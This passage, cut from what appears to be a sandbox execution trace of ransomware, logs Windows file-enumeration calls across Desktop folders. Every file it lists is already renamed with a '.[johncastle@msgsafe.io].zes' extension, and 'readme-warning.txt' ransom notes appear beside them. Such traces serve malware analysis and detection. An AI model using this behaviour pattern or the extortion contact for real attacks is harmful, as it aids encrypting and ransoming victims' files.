ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xc144, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Ml-L2Mnu1hfDn3Ebw.png.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ML-L2M~1.ZES")) returned 1 [0153.230] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f7a0020, ftCreationTime.dwHighDateTime=0x1d5e593, ftLastAccessTime.dwLowDateTime=0x208c23e0, ftLastAccessTime.dwHighDateTime=0x1d5d994, ftLastWriteTime.dwLowDateTime=0xa7a62430, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x11bc4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="NZt4WTx8.ots.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="NZT4WT~1.ZES")) returned 1 [0153.231] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47c93b50, ftCreationTime.dwHighDateTime=0x1d5db29, ftLastAccessTime.dwLowDateTime=0xfbb17060, ftLastAccessTime.dwHighDateTime=0x1d5dfa7, ftLastWriteTime.dwLowDateTime=0xa7a88590, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x19044, dwReserved0=0x0, dwReserved1=0xffff, cFileName="o4Mezc2IK4f8C_fMJ.rtf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="O4MEZC~1.ZES")) returned 1 [0153.231] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475420c0, ftCreationTime.dwHighDateTime=0x1d5e5fd, ftLastAccessTime.dwLowDateTime=0xbec567f0, ftLastAccessTime.dwHighDateTime=0x1d5e3bd, ftLastWriteTime.dwLowDateTime=0xa7aae6f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x7a54, dwReserved0=0x0, dwReserved1=0xffff, cFileName="p6WJ6Sf_Bnqv.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="P6WJ6S~1.ZES")) returned 1 [0153.231] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd92ca0, ftCreationTime.dwHighDateTime=0x1d5dde8, ftLastAccessTime.dwLowDateTime=0x14a0b710, ftLastAccessTime.dwHighDateTime=0x1d5dd65, ftLastWriteTime.dwLowDateTime=0xa7ad4850, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x16e14, dwReserved0=0x0, dwReserved1=0xffff, cFileName="rcM75 cm.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="RCM75C~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7e8cab0, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7e8cab0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7e8cab0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0xffff, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1924cd80, ftCreationTime.dwHighDateTime=0x1d5d860, ftLastAccessTime.dwLowDateTime=0xc779eae0, ftLastAccessTime.dwHighDateTime=0x1d5e027, ftLastWriteTime.dwLowDateTime=0xa7afa9b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xe3e4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="rFizuWFKJxS8V2i7l3.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="RFIZUW~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6135f5d0, ftCreationTime.dwHighDateTime=0x1d5df7d, ftLastAccessTime.dwLowDateTime=0x6e4a95b0, ftLastAccessTime.dwHighDateTime=0x1d5e215, ftLastWriteTime.dwLowDateTime=0xa7afa9b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xc9b4, dwReserved0=0x0, dwReserved1=0xffff, cFileName="upgHuG7Awn9.mkv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="UPGHUG~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc667d60, ftCreationTime.dwHighDateTime=0x1d5db8e, ftLastAccessTime.dwLowDateTime=0x80e68bc0, ftLastAccessTime.dwHighDateTime=0x1d5e76a, ftLastWriteTime.dwLowDateTime=0xa7b20b10, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1454, dwReserved0=0x0, dwReserved1=0xffff, cFileName="uSOZ4TNyZhhaa Gl3.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="USOZ4T~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3998fd30, ftCreationTime.dwHighDateTime=0x1d5db4d, ftLastAccessTime.dwLowDateTime=0xf13f4520, ftLastAccessTime.dwHighDateTime=0x1d5dd2d, ftLastWriteTime.dwLowDateTime=0xa7b92f30, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x2344, dwReserved0=0x0, dwReserved1=0xffff, cFileName="vvYk6R2xu.xlsx.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="VVYK6R~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2910a5d0, ftCreationTime.dwHighDateTime=0x1d5d922, ftLastAccessTime.dwLowDateTime=0xc421c190, ftLastAccessTime.dwHighDateTime=0x1d5d908, ftLastWriteTime.dwLowDateTime=0xa7bb9090, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x9654, dwReserved0=0x0, dwReserved1=0xffff, cFileName="W83hY-ueVY.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="W83HY-~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f43508, lpFindFileData=0x433fd20 | out: lpFindFileData=0x433fd20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xffff, cFileName="Xgmd_gfDjhMfGMTGlo", cAlternateFileName="XGMD_G~1")) returned 1 [0153.232] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.232] GetProcessHeap () returned 0x520000 [0153.232] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x82) returned 0x546fa8 [0153.232] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\*.*", lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3f435c8 [0153.232] GetProcessHeap () returned 0x520000 [0153.232] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x546fa8 | out: hHeap=0x520000) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32e6c60, ftCreationTime.dwHighDateTime=0x1d5e694, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce941450, ftCreationTime.dwHighDateTime=0x1d5e4cc, ftLastAccessTime.dwLowDateTime=0x60ddc7e0, ftLastAccessTime.dwHighDateTime=0x1d5e1e7, ftLastWriteTime.dwLowDateTime=0xa7bdf1f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x16d84, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ga 79jQ.csv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="GA79JQ~1.ZES")) returned 1 [0153.232] GetProcessHeap () returned 0x520000 [0153.232] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x284) returned 0x553158 [0153.232] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ecb6270, ftCreationTime.dwHighDateTime=0x1d5dc92, ftLastAccessTime.dwLowDateTime=0x10647020, ftLastAccessTime.dwHighDateTime=0x1d5e24b, ftLastWriteTime.dwLowDateTime=0xa7bdf1f0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x1b44, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qfzGN 6xma8CCH8IKS.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="QFZGN6~1.ZES")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7dce3d0, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7dce3d0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7dce3d0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0153.232] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sGnbgw8s2gTrD4", cAlternateFileName="SGNBGW~1")) returned 1 [0153.232] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.233] GetProcessHeap () returned 0x520000 [0153.233] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xa0) returned 0x3f5d290 [0153.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\*.*", lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3f43608 [0153.233] GetProcessHeap () returned 0x520000 [0153.233] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3f5d290 | out: hHeap=0x520000) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea2700e0, ftCreationTime.dwHighDateTime=0x1d5d9cf, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9c720, ftCreationTime.dwHighDateTime=0x1d5e0f0, ftLastAccessTime.dwLowDateTime=0x567cfe70, ftLastAccessTime.dwHighDateTime=0x1d5d99e, ftLastWriteTime.dwLowDateTime=0xa7c05350, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xe164, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="6R1trGA_1jq.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="6R1TRG~1.ZES")) returned 1 [0153.233] GetProcessHeap () returned 0x520000 [0153.233] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2a2) returned 0x5533e8 [0153.233] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x827035a0, ftCreationTime.dwHighDateTime=0x1d5e25f, ftLastAccessTime.dwLowDateTime=0x1e9314b0, ftLastAccessTime.dwHighDateTime=0x1d5dfc3, ftLastWriteTime.dwLowDateTime=0xa7c2b4b0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x17ea4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mGYbl5LMqWWKr.gif.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="MGYBL5~1.ZES")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74680640, ftCreationTime.dwHighDateTime=0x1d5e1f1, ftLastAccessTime.dwLowDateTime=0x4e982130, ftLastAccessTime.dwHighDateTime=0x1d5dabb, ftLastWriteTime.dwLowDateTime=0xa7c51610, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x14dc4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mnJKsprR.wav.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="MNJKSP~1.ZES")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb2cc90, ftCreationTime.dwHighDateTime=0x1d5dac6, ftLastAccessTime.dwLowDateTime=0x5d57d390, ftLastAccessTime.dwHighDateTime=0x1d5e557, ftLastWriteTime.dwLowDateTime=0xa7c51610, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6294, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="NglnlXvJLQ haes0xIg.gif.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="NGLNLX~1.ZES")) returned 1 [0153.233] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ohRy5R3Zh", cAlternateFileName="OHRY5R~1")) returned 1 [0153.233] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.233] GetProcessHeap () returned 0x520000 [0153.233] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xb4) returned 0x619e88 [0153.233] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Xgmd_gfDjhMfGMTGlo\\sGnbgw8s2gTrD4\\ohRy5R3Zh\\*.*", lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3f43648 [0153.233] GetProcessHeap () returned 0x520000 [0153.233] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x619e88 | out: hHeap=0x520000) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x758d1530, ftCreationTime.dwHighDateTime=0x1d5da65, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c042b00, ftCreationTime.dwHighDateTime=0x1d5d991, ftLastAccessTime.dwLowDateTime=0xb313aa90, ftLastAccessTime.dwHighDateTime=0x1d5d8ad, ftLastWriteTime.dwLowDateTime=0xa7c77770, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x11484, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="C OQSp3lrPEA6lKyBv.bmp.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="COQSP3~1.ZES")) returned 1 [0153.234] GetProcessHeap () returned 0x520000 [0153.234] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2b6) returned 0x553698 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfef9710, ftCreationTime.dwHighDateTime=0x1d5e434, ftLastAccessTime.dwLowDateTime=0xf96f89d0, ftLastAccessTime.dwHighDateTime=0x1d5deae, ftLastWriteTime.dwLowDateTime=0xa7d0fcf0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x5eb4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="O7GsOEI.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="O7GSOE~1.ZES")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71b17e10, ftCreationTime.dwHighDateTime=0x1d5e4ec, ftLastAccessTime.dwLowDateTime=0xadd86a10, ftLastAccessTime.dwHighDateTime=0x1d5da39, ftLastWriteTime.dwLowDateTime=0xa7d35e50, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xd844, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Pef90osST9zF.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="PEF90O~1.ZES")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d5bfb0, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7d5bfb0, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b5be80, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x55636b10, ftLastAccessTime.dwHighDateTime=0x1d5e244, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xecf4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zeCGssAJsgRZgGpoHCS.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZECGSS~1.ZES")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43648, lpFindFileData=0x433f588 | out: lpFindFileData=0x433f588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99b5be80, ftCreationTime.dwHighDateTime=0x1d5d97a, ftLastAccessTime.dwLowDateTime=0x55636b10, ftLastAccessTime.dwHighDateTime=0x1d5e244, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xecf4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="zeCGssAJsgRZgGpoHCS.swf.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="ZECGSS~1.ZES")) returned 0 [0153.234] FindClose (in: hFindFile=0x3f43648 | out: hFindFile=0x3f43648) returned 1 [0153.234] GetProcessHeap () returned 0x520000 [0153.234] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x553698 | out: hHeap=0x520000) returned 1 [0153.234] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.234] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7da8270, ftCreationTime.dwHighDateTime=0x1d66ceb, ftLastAccessTime.dwLowDateTime=0xa7da8270, ftLastAccessTime.dwHighDateTime=0x1d66ceb, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x6c5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="readme-warning.txt", cAlternateFileName="README~1.TXT")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0e0a90, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x7baf9a20, ftLastAccessTime.dwHighDateTime=0x1d5e70b, ftLastWriteTime.dwLowDateTime=0xa7d5bfb0, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x3754, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="S0OmtXwErpHh0OJ.flv.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="S0OMTX~1.ZES")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40c12bf0, ftCreationTime.dwHighDateTime=0x1d5e7eb, ftLastAccessTime.dwLowDateTime=0x1f05c1f0, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0xa7d82110, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x18e94, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wS0c4nhKFr.gif.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WS0C4N~1.ZES")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f18d60, ftCreationTime.dwHighDateTime=0x1d5e0d0, ftLastAccessTime.dwLowDateTime=0xd5079a10, ftLastAccessTime.dwHighDateTime=0x1d5e79b, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xcfe4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YK9azGU-728BZMlu.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="YK9AZG~1.ZES")) returned 1 [0153.234] FindNextFileW (in: hFindFile=0x3f43608, lpFindFileData=0x433f810 | out: lpFindFileData=0x433f810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f18d60, ftCreationTime.dwHighDateTime=0x1d5e0d0, ftLastAccessTime.dwLowDateTime=0xd5079a10, ftLastAccessTime.dwHighDateTime=0x1d5e79b, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0xcfe4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YK9azGU-728BZMlu.mp4.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="YK9AZG~1.ZES")) returned 0 [0153.234] FindClose (in: hFindFile=0x3f43608 | out: hFindFile=0x3f43608) returned 1 [0153.234] GetProcessHeap () returned 0x520000 [0153.234] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5533e8 | out: hHeap=0x520000) returned 1 [0153.234] WaitForSingleObject (hHandle=0x5fc, dwMilliseconds=0x0) returned 0x102 [0153.234] FindNextFileW (in: hFindFile=0x3f435c8, lpFindFileData=0x433fa98 | out: lpFindFileData=0x433fa98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5de1790, ftCreationTime.dwHighDateTime=0x1d5de38, ftLastAccessTime.dwLowDateTime=0xdbdffdb0, ftLastAccessTime.dwHighDateTime=0x1d5d9b7, ftLastWriteTime.dwLowDateTime=0xa7da8270, ftLastWriteTime.dwHighDateTime=0x1d66ceb, nFileSizeHigh=0x0, nFileSizeLow=0x76d4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WGs9eIzE7L6We.odt.[4B2E4630].[johncastle@msgsafe.io].zes", cAlternateFileName="WGS9EI~1.ZES")) returned 1 [0153.235] FindNextFileW (in: hFindFile=0x3f435c8, 